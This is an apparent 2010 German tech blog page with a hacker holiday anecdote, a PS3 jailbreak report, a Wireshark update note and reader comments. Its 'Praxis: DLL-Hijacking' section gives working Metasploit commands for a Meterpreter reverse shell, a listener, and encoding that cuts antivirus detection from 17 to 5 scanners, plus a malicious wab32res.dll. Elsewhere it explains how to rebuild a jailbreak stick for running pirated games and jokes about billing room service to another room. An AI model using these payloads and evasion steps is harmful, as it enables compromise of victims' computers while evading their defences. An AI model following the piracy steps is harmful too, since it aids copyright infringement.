HomeArtikelDownloadsForum
PCFreunde.deArtikelAllgemeinH4ckb3rts BlogH4ckb3rts Blog: Hacker hacken Hacker!
Besucher online: 26
Hinweis
Diese Seite steht zum Verkauf.
Mehr Infos

Schnellsuche

Kategorien
Montag, 27. Dezember 2010 Seite 17/25
KW 36: Urlaub auf Hackerart
H4ckb3rts Blog (Quelle: PCFreunde.de)
Wie letzte Woche bereits erwähnt, befindet sich 0tt0 im Urlaub. Er ist gemeinsam mit Tina nach Kroatien gefahren. Ich möchte das noch einmal unterstreichen: Der Mann ist mit einer gutaussehenden, jungen Frau in den Ferien. Er bewohnt gemeinsam mit ihr ein Hotelzimmer und der zugehörige Balkon wird ganztägig von der adriatischen Sonne beschienen. Und jetzt dürfen alle genau einmal raten, womit 0tt0 seine Urlaubstage verbringt. Genau: Er hockt am mitgebrachten Laptop. Er schickt mir sogar Blogposts.

Tina kriegt ihn hin und wieder dazu, mit ihr an den Hotelpool zu kommen und einmal war er sogar schon am Strand. Bis sein Akku alle war. Den Rest der Zeit sitzt er im Hotelzimmer und hackt. Im Moment scheitert er noch daran, den Zimmerservice des Hotels, den man online anfordern kann, auf eine andere Zimmernummer buchen zu lassen. Mit den Bezahl-Fernsehprogrammen hat er es schon geschafft.

Trotzdem – oder vielleicht deswegen – behauptet er allen Ernstes, seinen Urlaub voll und ganz zu genießen. Er sagt, er schwelge in der Schönheit des Landes. Sein Beleg für diese Behauptung ist schwer zu entkräften: Er hat einen kroatischen Strand als Desktop-Hintergrund eingerichtet.

0tt0s Urlaubs-Desktop - Ein Strand in Kroatien. (Quelle: PCFreunde.de)
PlayStation 3: Kopierschutz geknackt
Auch wenn es nur eine Frage der Zeit war, so ist es doch eine ungewöhnlich lange solche geworden. Aber was lange währt, soll ja endlich gut werden. Verworrener Vorrede kurzer Sinn: Die PS3 ist geknackt. Mit dem als PSJailbreak titulierten Hardware-Hack ist es möglich, eigene Anwendungen auf der Sony-Konsole auszuführen. Und "eigene Anwendungen" schließt – das ist die eigentliche Sensation – Sicherheitskopien von PS3-Spielen ein. Klartext: Auf der PlayStation3 funktionieren Raubkopien.

PlayStation-Veteranen, die sich jetzt an alte Zeiten erinnern und sich schon drauf freuen, irgendwelche Chips in ihre Konsole zu löten, können den Lötkolben wieder hinlegen: Für den PSJailbreak ist keine Handarbeit erforderlich, es handelt sich um einen speziellen USB-Stick. Der wird einfach an die Konsole angesteckt und wirkt dann seine recht komplizierte Buffer-Overflow-Magie: Die Lücke, die der PSJailbreak ausnutzt, ist diejenige, die geohot vor nicht allzu langer Zeit entdeckte.

Beweisvideo zum PSJailbreak (Quelle: YouTube/OzModChips)
Gehandelt wird der PSJailbreak-Stick in den USA für 150 US-$, in Europa wird er in einigen Läden schon für 120 € angeboten. Dabei handelt es sich aber um Vorbestellungen, denn erst im Laufe dieser Woche werden die ersten Sticks in Europa lieferbar sein. Einmal angeschlossen, fügt ein Jailbreak-Stick dem PS3-Hauptmenü den Punkt "Backup Manager" hinzu, über den vorhandene Spiele-Discs auf die interne oder eine externe Festplatte gesichert werden können. Anschließend lassen sie sich von dort starten, ohne dass eine Scheibe eingelegt sein muss.

Naturgemäß ist der Hack vorläufig auf die aktuelle Firmware-Version 3.41 beschränkt. Da damit zu rechnen ist, dass Sony den PSJailbreak mit kommenden Firmware-Updates wieder aushebeln wird, sollten experimentierfreudige PlayStation-Zocker ihre Konsole auf dem 3.41-Stand belassen. Ob und wie spätere Versionen des PSJailbreak an zukünftige Firmware-Versionen angepasst werden, bleibt abzuwarten. Zunächst gilt: 3.41 und sonst nichts.

Nun sind natürlich die 120 € für einen PSJailbreak-Stick kein Pappenstiel. Immerhin ist das fast die Hälfte des Anschaffungspreises der Konsole selbst oder der Gegenwert von zwei bis vier PS3-Spielen. Glücklicherweise ist der kommerzielle USB-Konsolenknacker nicht die einzige Möglichkeit, die PlayStation zu jailbreaken: Mit ein wenig Geduld und etwas Freude am Selbermachen kann man für weniger als 20 € seinen eigenen PSJailbreak-Stick zusammenbasteln.

Zunächst muss man dazu ein geeignetes USB-Board in die Finger kriegen. An dieser Stelle ist die Geduld gefragt, denn die entsprechenden Boards sind praktisch überall ausverkauft. Welche das sind, lässt sich auf der Heimatseite des psgroove-Projektes nachlesen, das die Open-Source-Parallele zum PSJailbreak darstellt. Dort findet man auch den Quellcode der gleichnamigen Software, die auf die USB-Boards aufzuspielen ist. Allerdings distanzieren sich die Macher der psgroove-Software von jeder Software-Piraterie, weshalb aus ihrem Code der "Backup-Manager" entfernt ist. Stattdessen öffnet psgroove die PlayStation nur für legale, aber nicht von Sony autorisierte Anwendungen oder Spiele.

Doch auch diese Hürde ist für Möchtegern-PS3-Raubkopierer nicht unüberwindlich. Durch den Austausch einer einzelnen Quellcode-Datei lässt sich der Backup-Manager wieder in psgroove integrieren. Das entsprechende File descriptor.h lässt sich aus vielen der dunkleren Ecken des Internets herunterladen. Ersetzt man die ursprüngliche descriptor.h-Datei durch die modifizierte Version und übersetzt den Quellcode dann anweisungsgemäß, bekommt man einen PSJailbreak-Stick, der dem kommerziellen Original in nichts nachsteht.

Vier Jahre nach der Markteinführung der PlayStation 3 ist es also endlich geschehen: Sie wurde gehackt. Abgesehen vom voraussichtlich scharenweisen Zulauf von Raubkopierern zu Sonys Konsole ist damit noch ein zweiter, viel aussichtsreicherer Pfad eröffnet: Auf geknackten PlayStations laufen endlich auch unsignierte Anwendungen. Die Open-Source-Gemeinde wird auf die PS3 losgehen und hoffentlich ein vielfältiges Softwareangebot erschaffen, durch das aus der Spielkonsole ein schicker, kleiner Alleskönner werden könnte.
Update: WireShark 1.4 veröffentlicht
WireShark (Quelle: wireshark.org)
Eine kurze Update-Notiz: Die Mutter aller Packet Sniffer, WireShark, ist in der Version 1.4 erschienen. Skurriles neues Feature: WireShark kann jetzt jpeg-Dateien öffnen. Das ist ungefähr so, als könne man mit dem Photoshop Audiodateien öffnen, um sich die Wellenform anzusehen. Aber ohne etwas zu hören. Was das also soll, muss mir erst mal jemand erklären.

Für Windows- und OS-X-Nutzer stehen die fertigen Installationsdateien zum Download bereit, Linuxfreunde hingegen müssen die neue WireShark-Version vorerst selbst kompilieren.
Praxis: DLL-Hijacking
---BEGIN TRANSMISSION, FROM: 0tt0_n0rmal0---

Nachdem kürzlich eine königliche Sicherheitslücke in Windows publik wurde, wollen wir deren Anwendbarkeit und damit ihre Gefährlichkeit doch mal prüfen. Wie immer ist unsere Testplattform und damit auch unsere Werkzeugkiste ein Backtrack-4-Linux mit aktuellem Metasploit-Framework. Ein Update von Metasploit geht am einfachsten per Fast-Track, alternativ auch an der Konsole:
msfupdate
Unser Tagesplan sieht vor, die aktuelle dll-Ausführungslücke zu prüfen. Falls das bereits als DLL-Hijacking bekannte Problem so bedrohlich ist, wie der Medienhype nahe legt, sollten wir am Ende so etwas wie die Atombombe unter den Windows-Exploits haben.

Zunächst müssen wir eine geeignete dll-Datei erzeugen. Mit dem DLL-AuditKit von HD Moore lässt sich für jeden Windows-PC prüfen, welche der lokalen Anwendungen anfällig fürs DLL-Hijacking ist. Bei meinen Tests erwiesen sich 7pc-Dateien als weit verbreitete Angriffsfläche. Sowohl unter Windows XP als auch unter Windows 7 benötigen diese Zertifikatsdateien eine wab32res.dll, die sie zunächst aus dem aktuellen Arbeitsverzeichnis laden. Wir werden also eine präparierte wab32res.dll platzieren und prüfen, ob sie den Opferrechner tatsächlich kompromittert, wenn eine beliebige 7pc-Datei aus demselben Verzeichnis gestartet wird.

Damit wir die Ergebnisse unseres DLL-Hijacking-Versuchs einordnen können, brauchen wir Vergleichswerte. Dazu nehmen wir den Standard-Metasploit-Payload in Form einer ausführbaren Datei, einmal unverschlüsselt, zweimal auf verschiedene Weise kodiert. Der erwähnte Standard-Payload ist eine Reverse-Shell des Meterpreters über TCP. Das dürfte – jedenfalls im nichtprofessionellen Umfeld – die häufigste Methode sein, mit der fremde Rechner gegen den Willen des Besitzers übernommen werden. Wenn ein Anti-Virus-Programm also diese Datei nicht abfängt, wenn sie ausgeführt wird, ist es nutzlos.

Erzeugen wir also zunächst eine unverschlüsselte exe-Datei, die via TCP eine meterpreter-reverse-shell startet. Wir gehen davon aus, dass 192.168.222.2 unser Angreifer, also die BackTrack-Maschine ist. Unter 192.168.222.3 befindet sich das Opfer, im Beispiel ein PC mit Windows XP SP 3. Mittels msfpayload wird die ausführbare Windows-Datei erzeugt, bei Schwierigkeiten zeigt msfpayload -h ein paar Handhabungstipps an.
cd /pentest/exploits/framework3/
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.222.2 X > metpret_revtcp_unenc.exe
Wird die dabei entstehende Datei metpret_revtcp_unenc.exe auf die Opfermaschine kopiert und ausgeführt, versucht sie, eine Verbindung "nach Hause" herzustellen, also zum BackTrack-Rechner unter 192.168.222.2. Das funktioniert aber erst, wenn dort Empfangsbereitschaft hergestellt wurde. Wir starten Metasploit und anschließend den Universal-Handler.
cd /pentest/exploits/framework3/
./msfconsole
 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.222.2
exploit
Jetzt sollte die BackTrack-Maschine Verbindungen vom Opfer entgegennehmen können. Gelingt dies, öffnet sich eine meterpreter-Konsole. Das ist gleichbedeutend mit der Kompromittierung des Rechners. Allerdings wird die unverschlüsselte exe-Datei höchstwahrscheinlich vom Anti-Virus-Programm auf dem Opferrechner abgefangen. Tatsächlich melden 17 von 43 per virustotal.com getesteten AV-Lösungen eine infizierte Datei, die sie blockieren würden. Mit dieser Datei würde ein Angreifer also erstens auffallen und zweitens keinen Erfolg haben.

Kodieren wir die Datei mittels msfencode. Wiederum gilt, dass msfencode -h weiter hilft, wenn es stockt.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.222.2 R | msfencode -c 5 -e  x86/shikata_ga_nai -t exe > metpret_revtcp_5xsgn.exe
Diese Datei leistet genau dasselbe wie ihre unverschlüsselte Schwester, wird aber nur noch von 11 Anti-Virus-Programmen erkannt. Beispielsweise der populäre avast!-Scanner erkennt diesen Angriff schon nicht mehr. Doch es geht noch besser: Kodieren wir erneut, diesmal aber unter Zuhilfenahme einer anderen ausführbaren Windowsdatei als Vorlage für unser meterpreter-File. Im Beispiel verwenden wir eine im Heimatverzeichnis des Superusers abgelegte Windows-Taschenrechner-EXE.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.222.2 R | msfencode -c 5 -e  x86/shikata_ga_nai -t exe -x /home/root/calc.exe > metpret_revtcp_5xsgn_templcalc.exe
Das Ergebnis: Die so erzeugte Datei, die wohlgemerkt die exakt gleiche Funktionionalität hat wie ihre von 17 AV-Programmen blockierte, unverschlüsselte Schwester, fällt nur noch fünf Virenscannern auf. Darunter ist keiner der bekannten und verbreiteten Vertreter.

Doch nun endlich zur präparierten dll-Datei! Wiederum erzeugen wir eine solche mit msfpayload.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.222.2 D > wab32res.dll
Damit diese dll vom Opferrechner aufgerufen wird, muss sie sich im selben Verzeichnis befinden wie eine zu öffnende p7c-Datei. Dieses Verzeichnis allerdings kann in einer Windows-Freigabe oder einem WebDAV-Ordner liegen, also praktisch überall im Netz. Außerdem kann die dll-Datei versteckt sein, sodass sie von einem standardmäßig konfigurierten Windows nicht angezeigt werden würde. Das zugehörige p7c-File darf eine beliebige, auch leere Datei sein, es kommt nur auf die Endung ".p7c" an. Wird sie gedoppelklickt, funktioniert der Exploit auch, auf der Angreifer-Maschine öffnet sich eine meterpreter-Session.

Die Sache hat nur einen Haken: Die präparierte dll-Datei wird von insgesamt 19 Virusprogrammen erkannt und gestoppt. Das sind noch mehr, als bei der unverschlüsselten exe-Datei derselben Funktionalität. Selbst eine Verschlüsselung der dll bringt nur wenig, immer noch 16 Virenscanner schlagen Alarm. Davon abgesehen funktioniert der Exploit nach der Verschlüsselung jedenfalls in meinen Tests nicht mehr.

Fazit: DLL-Hijacking ist eine ernstzunehmende Bedrohung, aber nicht der Untergang der vernetzten Welt. Ein aktueller Virenscanner schützt vor DLL-Hijacking besser als vor so manchem altbekannten Problem. Entscheidend ist, was für ein Trojaner oder Virus eingeschleust werden soll, und nicht, auf welchem Wege dies geschieht. Nach wie vor erwächst der beste Schutz aus der eigenen Aufmerk- und Wachsamkeit.

---END TRANSMISSION---
ZurückWeiter
© Copyright PCFreunde.de
Inhaltsverzeichnis
Kommentare
Schreib uns deine Meinung zu diesem Artikel - einfach registrieren und los!
Kommentar schreiben
 
BgF
12.07.2010 22:42
Also, wieder mal ein super Artikel :wink:
Zum Thema Apple, lässt sich nur sagen..Apple+Software Entwicklung=Fail!
Leider hört man einfach nicht viel von diesen Problemen und dadurch der irrglaube entsteht, dass zum Beispiel Mac OS X ein so sicheres OS wäre :roll:
Ich finde es jedenfalls toll, das man auch noch kritische Stimmen zu diesem Konzern und seine Produkte hört.
Wobei ich die Produkte von Apple nicht mal schlecht finde, vorallem das Apple Ipod touch, ausser natürlich das sie vollkommen überteuert sind.
Aber alleine schon wegen ihrer unglaublischen arroganten, ja schon fast Sektenartige, Firmenpolitik gehört dieser Konzern einfach nur Boykottiert.....
 
ATI Gott
13.07.2010 17:40
Für mich zu viel Apple in diesem Artikel :evil:
Es gibt noch andere Dinge, über die man sich beschweren kann :mrgreen:
 
TK814
17.07.2010 17:42
Was ein Glück das die Hacker noch Stolz gehabt haben.
 
TheFreak
03.08.2010 14:30
Wer bracht schon GSM, Edge, UMTS oder Wimax, wenn man LTE hat :mrgreen:

:arrow: Long
:arrow: Term
:arrow: Evolution
 
-luke-
10.08.2010 00:38
Oh man ja. Heuschnupfen, der endlose Fluss. So gehts mir auch, von Anfang August bis Ende September ständig ne verstopfte Nase. Da helfen auch keine AntiHistaminika. Also h4ckb3rt, du leidest nicht allein! Durchhalten lautet die Devise.
 
-h0m3r-
24.08.2010 12:00
Zitat:
Egal, Kernel-Update ist angesagt!


apt-get upgrade
und
pacman -Syu

Erledigt! :mrgreen:
 
tho.moore
24.08.2010 12:16
*klugschei*ermodus an*: :mrgreen:

Zitat:
apt-get upgrade

Da fehlt ein apt-get update, sonst hat der Befehl wenig Sinn.

*klugschei*ermodus aus* :mrgreen:
 
-h0m3r-
24.08.2010 16:46
Ja du hast recht. :wink:
Ich wusste, dass das kommt, war aber zu faul zum editieren. :mrgreen: :mrgreen: :mrgreen:
 
TheFreak
01.09.2010 15:38
-h0m3r- hat folgendes geschrieben:
Ja du hast recht. :wink:
Ich wusste, dass das kommt, war aber zu faul zum editieren. :mrgreen: :mrgreen: :mrgreen:


Fast wie Homer, nur das der es gar nicht erst bemerkt hätte :mrgreen:
 
thepower
14.11.2010 12:51
Apple? Das ist doch die Firma, die bis vor kurzem schlechte Telefone über die Telekom verkauft hat? :idea: Jetzt hat auch Mr. Gates gemerkt, daß man mit schlechter Software im Telefonmarkt Schrott verkaufen kann... :mrgreen:
 
TheFreak
14.11.2010 22:26
thepower hat folgendes geschrieben:
Apple? Das ist doch die Firma, die bis vor kurzem schlechte Telefone über die Telekom verkauft hat? :idea: Jetzt hat auch Mr. Gates gemerkt, daß man mit schlechter Software im Telefonmarkt Schrott verkaufen kann... :mrgreen:


Wenn Microsoft schon nicht ein Betriebssystem auf einem PC einigermaßen zum Laufen bringt, wie sollten die dann bei einem Handy hinbekommen? Mal ernsthaft, Benutzeroberfläche: Scheiße und Apos fehlen (App Store).
Da hat sich Apple echt was geiles gebastelt. Andere entwickeln für ihr Produkt Programme und Apple bekommt auch noch was ab.

Also deswegen über Apple herzuziehen kann ich nicht nachvollziehen. Die Benutzeroberfläche ist echt geil (alles andre eingeschlossen ;) )

Gruß Dani
 
thepower
15.11.2010 11:01
Nur weil etwas Geld bringt ist es nicht gut! Microsoft OS? Das ist zuviel verlangt. Aber wozu BSD oder linux gibt's günstig und ist besser, meiner unmaßgeblichen Meinung nach. Bei apple heisst das glaub ich Mac OS oder so... damit mag sich rumplagen wer Grafiken mag... Dani, ich persönlich habe mir etwas mehr versprochen von einem Telefon was "so teuer" ist und bin sehr enttäuscht von dem Spiel was Apple treibt. Auch empfehle ich die finger von dem neuen Ding, den Namen hab ich mir schon gar nicht gemerkt.... 500 € für'n netbook? Solche Spitzbuben kannst nur strafen, wenn du sie wirtschaftlich nicht unterstützt, solange Daimler noch Autos verkaufen kann wird kein wirklich gutes mehr entwickelt...
lg
karl
 
TheFreak
15.11.2010 16:48
thepower: Behindert dich am iPhone 4 etwa die kleinen Empfangsprobleme? Wenn ja, machst du wirklich was falsch :wink:

Aber nun BTT!
 
BgF
06.12.2010 23:35
Selbst wenn es die US-Regierung schafft Wikileaks aus dem Internet zu verbannen, wird es halt in Wikileaks X2 oder so etwas unbenannt...
Wann verstehen die Politker endlich, dass man so etwas nicht mit Zensur verhindert. Selbst China mit ihrer "großen Firewall" haben immer wieder Lücken und deren Zensur ist ebenfalls alles andere als Perfekt.
Aber es ist lustig immer wieder anzusehen wie sie es versuchen :roll:
Der Haftbefehl wurde für Assange , in UK, ausgestellt.> Klick

Bin gespannt was daraus wird....
 
BgF
13.12.2010 21:09
Ein wieder schön zu lesender Beitrag!

Amazon war gestern ebenfalls down, doch anscheinend haben sie das selbst hinbekommen.
Die neue Vorgabe von Anon. könnte schon etwas bewirken, dass sie auch mehr machen als am Computer zu sitzen, sieht man schön am Project Chanology ;)
Was aber dem Fass die Krone ins Gesicht schlägt , ist die Berichterstattung der großen Medieninstituten...Aber mal erlich, wer hat was anderes erwartet?
 
BgF
20.12.2010 22:01
Zitat:
metaphorisch gesprochen – der Schlüssel im Schloss drehte?


:lol:

Ja, diese Sache um Assange wird aber irgendwie schon wieder langweilig, jedenfalls wenn es nach den großen Medien geht.

Kondom extra zum platzen gebracht? Wie soll denn das gehen? Ich fang besser garnicht erst damit an, was das für ein Sinn ergeben sollte..
Zur 2. Frau, sie hat geschlafen, ist aufgewacht und hat gemerkt das er gerade[....] und sie hat sich nicht Beschwerd? Wo ist die Straftat?

Naja man muss kein IQ von 103 haben um zu merken, dass das nur ein Weg zur Auslieferung von Assange in die USA sein soll.

PS: Ich kann doch nicht der einzige sein, der diesen Blog Montag liesst :wink: ?
 
nikasio14
20.12.2010 22:59
"BgF" hat folgendes geschrieben:
Ich kann doch nicht der einzige sein, der diesen Blog Montag liesst ?


Nein, bist du nicht =) *Großer_Fan-Von-H4ckb3rt-Sei*

diese Sache mit Assange wird immer skurriler....
Hinaus! -mit der Pressefreiheit- Hinaus! China wir kommen! :twisted:

Das Steamlock-Knock-Knock-Schloss ist aber echt mal der Hammer =) so was fehlt mir noch! ;-) 8)
 
TheFreak
22.12.2010 20:14
Also wenn Assange wirklich diese Straftat begangen hat, dann wäre er bestimmt schon längst in den USA, nur ich denke die Behörden von England trauen der Geschichte auch nicht so ganz, oder wissen schon längst, das das nur ein Vorwand ist...
 
geilo
22.12.2010 21:56
Ach die suchen irgentwas damit sie den hinter Gittern stecken können
Assange hat nicht wirlich gutes über die USA gesagt
 
TheFreak
22.12.2010 23:43
geilo hat folgendes geschrieben:
Ach die suchen irgentwas damit sie den hinter Gittern stecken können
Assange hat nicht wirlich gutes über die USA gesagt


Schon klar, die Wahrheit schadet der USA immens :roll:
 
Alle BeiträgeKommentar schreiben
Community Login
eMail:
Passwort:
Auto-Login